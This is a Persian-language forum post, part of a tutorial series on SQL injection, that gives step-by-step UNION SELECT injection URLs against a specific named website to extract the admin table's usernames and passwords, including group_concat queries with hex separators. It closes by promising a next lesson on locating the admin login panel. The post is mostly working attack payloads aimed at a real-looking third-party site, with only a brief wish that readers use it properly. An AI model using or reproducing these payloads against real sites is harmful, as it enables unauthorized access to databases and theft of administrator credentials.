- انجمن عمومی گسترش فناوری آگو
- انجمن های عمومی گسترش فناوری آگو
- برنامه نویسی
- آموزش Sql Injection ( توضيح كوتاه در مورد SQL INJECTION)
|
آموزش Sql Injection ( توضيح كوتاه در مورد SQL INJECTION)
|
|
03-11-2013, 07:21 PM
ارسال: #6
|
|||
|
|||
|
RE: آموزش Sql Injection ( تبدست آوردن یوزرنیم و پسورد مدیریت سایت)
ما بعد از جمع آوری اطلاعاتی همچون Table ادمین سایت که در این سایت به نام Admin بود و کالومن های این تیبل که شد Admin_id و username و password را بدست آوردیم حال میرسیم به استفاده از این اطلاعات و در نتیجه بدست آوردن اطلاعات مهم تری همچون یوزرنیم و پسورد ادمین سایت .
شکل کلی استخراج اطلاعات از کالومن های یک تیبل به شکل زیر است : کد php: http://www.p5n.net/mtl/news-full.php?id=-14+union+all+select+1,2,3,X,5,6+from+Y-- در دستور بالا Y اسم تیبل مورد نظر و X هم کالومن تیبل Y است ما با تغییر Y میتوانیم اطلاعات تیبل های دیگر را هم بدست آوریم و با تغییر X میتوانیم کالومن های دیگر تیبل Y را بدست آوریم . نکته : هر کالومن مختص تیبل خودش است و بر روی تیبل های دیگر کاربردی ندارد مگر شباهت اسمی داشته باشند . حالا ما اطلاعات خودمان را در این دستور قرار میدهیم : کد php: http://www.p5n.net/mtl/news-full.php?id=-14+union+all+select+1,2,3,username,5,6+from+admin-- با وارد کردن دستور بالا سایت اسم اولین یوزرنیم ادمین سایت را به ما نشان میدهد . کد php: http://www.p5n.net/mtl/news-full.php?id=-14+union+all+select+1,2,3,password,5,6+from+admin-- با دستور بالا پسورد یوزر اول را هم بدست آوردیم تا الا یوزرنیم و پسورد یکی از ادمین های سایت را بدست آوردیم ولی برای بدست آوردن تمام یوزر و پسور ها میتوانیم از دستور زیر استفاده کنیم که در درس های قبل توضیحات آن را داده بودم : [CODE]http://www.p5n.net/mtl/news-full.php?id=-14+union+all+select+1,2,3,group_concat(admin_id,us ername,password),5,6+from+admin--[/ CODE] با وارد کردن دستور بالا تمام یوزرنیم و پسورد های ادمین های سایت را بدست می آوریم ولی تنها مشکلی که هست اینه که به هم چسپیده هستند، برای جدا کردن آنها از یک کارکتر HEX شده استفاده میکنیم برای مثال نقل قول ( : ) که اگر به HEX آن را تبدیل کنیم میشود : 0x3A ما بین کالومن های خودمون این کد رو قرار میدیم و اطلاعات را از هم جدا میکنیم : کد php: http://www.p5n.net/mtl/news-full.php?id=-14+union+all+select+1,2,3,group_concat(admin_id,0x3a,username,0x3a,password),5,6+from+admin-- با وارد کردن دستور بالا اطلاعات به شکل جدا شده توسط : به ما نشان داده میشوند . خوب تا این قسمت آموزشات توانستید یوزرنیم و پسورد یک سایت را استخراج کنید . در ادامه با پیدا کردن صفحه ورود به پنل ادمین آشنا میشید ... امید وارم از آموزشات در راه صحیح و درست استفاده کنید . |
|||
|
|
|
| پیامهای داخل این موضوع |
|
آموزش Sql Injection ( توضيح كوتاه در مورد SQL INJECTION) - agotd - 02-17-2013, 02:50 PM
آموزش Sql Injection ( پیدا کردن سایت باگ دار و تست نفوذ پذیری) - agotd - 02-21-2013, 02:52 PM
RE: آموزش Sql Injection ( بدست آوردن ستون ها و استخراج ورژن ، یوزر و نام بانک) - agotd - 02-24-2013, 02:56 PM
RE: آموزش Sql Injection (بدست آوردن تیبلها) - agotd - 02-28-2013, 06:39 PM
RE: آموزش Sql Injection ( تبدست آوردن کالومن های یک تیبل) - agotd - 03-06-2013, 03:29 PM
RE: آموزش Sql Injection ( تبدست آوردن یوزرنیم و پسورد مدیریت سایت) - agotd - 03-11-2013 07:21 PM
|
کاربرانِ درحال بازدید از این موضوع: 1 مهمان
